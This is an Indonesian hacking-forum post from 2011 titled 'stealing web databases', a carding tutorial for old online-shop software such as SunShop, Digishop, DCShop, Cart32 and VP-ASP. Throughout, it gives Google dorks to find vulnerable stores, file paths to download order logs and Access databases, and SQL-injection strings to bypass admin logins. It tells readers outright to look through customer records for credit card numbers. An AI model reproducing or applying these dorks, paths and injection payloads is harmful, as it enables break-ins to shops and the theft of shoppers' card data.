baik engga usah banyak omong langsung ke tkp aja
google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example :
[You must be registered and logged in to see this link.]masukin bugsnya :
[You must be registered and logged in to see this link.]trus copy-paste tuch log'nya di notepad biar gampang di baca
keyword : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya : 'or"="
Keyword : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example :
[You must be registered and logged in to see this link.]Injection : selanjutnya masukin bugs di atas jadi :
[You must be registered and logged in to see this link.]kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces
keyword : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example :
[You must be registered and logged in to see this link.]masukin bugs menjadi :
[You must be registered and logged in to see this link.]trus bug tadi diganti dengan /data/pdshoppro.mdb
kadang ada password adminnya lho
keyword : inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
kita gunakan dari bugs webshop Sunshop
google dork : "Powered by SunShop 3.2"
Atau google dork : inurl:"/sunshop/index.php?action="
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik "OK" aja
Contoh buat kalian :
[You must be registered and logged in to see this link.]ganti dengan admin
[You must be registered and logged in to see this link.]Login pake SQL Injection :
Username : admin
Password :'or''='
Kita gunakan bugs dari webshop Digishop
Google dork : "Powered by Digishop 3.2"
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : 'or"="
Password : 'or"="
google dork : inurl:"mall/lobby.asp"
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
jadi
[You must be registered and logged in to see this link.]dapat dech .mdb ===> trus klik open database
JANGAN klik "convert databese" ===> klk view orders
====> trus cari orang yg pernah belanja contoh pada
customer no 36 trus dimana no CCnya badKiddes....
Mendowload file log order DCShop pada folder orders!
keyword allinurl:/DCShop/
bug: /DCShop/orders/orders.txt atau
/DCShop/Orders/orders.txt
Cari target dahulu Website commerceSQL di google.com,
dengan keyword allinurl:/commercesql/
Misalkan kita mendapat target dg url
[You must be registered and logged in to see this link.] , maka :
Ganti url tsb menjadi ->
[You must be registered and logged in to see this link.]Contoh untuk melihat admin config ->
[You must be registered and logged in to see this link.]Contoh untuk melihat admin manager ->
[You must be registered and logged in to see this link.]Sedangkan utk melihat file log/ccnya
->
[You must be registered and logged in to see this link.]EShop, Mendowload file log order EShop pada folder database!
keyword allinurl:/eshop/
bug: /cg-bin/eshop/database/order.mdb
contoh:
[You must be registered and logged in to see this link.]Cart32 v3.5a, keyword allinurl:/cart32.exe/
exp:http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
menjadi
[You must be registered and logged in to see this link.] <-- setelah string /cart32.exe/ ditambah kata error Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses! Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc's! Copy salah satu file .c32 yg ada atau semuanya ke notepad Ganti string url tsb. menjadi seperti ini :
[You must be registered and logged in to see this link.] <-- dimana string .exe dihapus/dihilangkan! Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
[You must be registered and logged in to see this link.]Contoh
[You must be registered and logged in to see this link.]VP-ASP Shopping Cart 5.0 Cara II
SQL Injection vulnerability pada script 'shopdisplayproducts.asp'
keyword allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
[You must be registered and logged in to see this link.]GantiĀ²lah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
dst...
Subyek: mencuri database web 
Fri Aug 19, 2011 9:42 pm
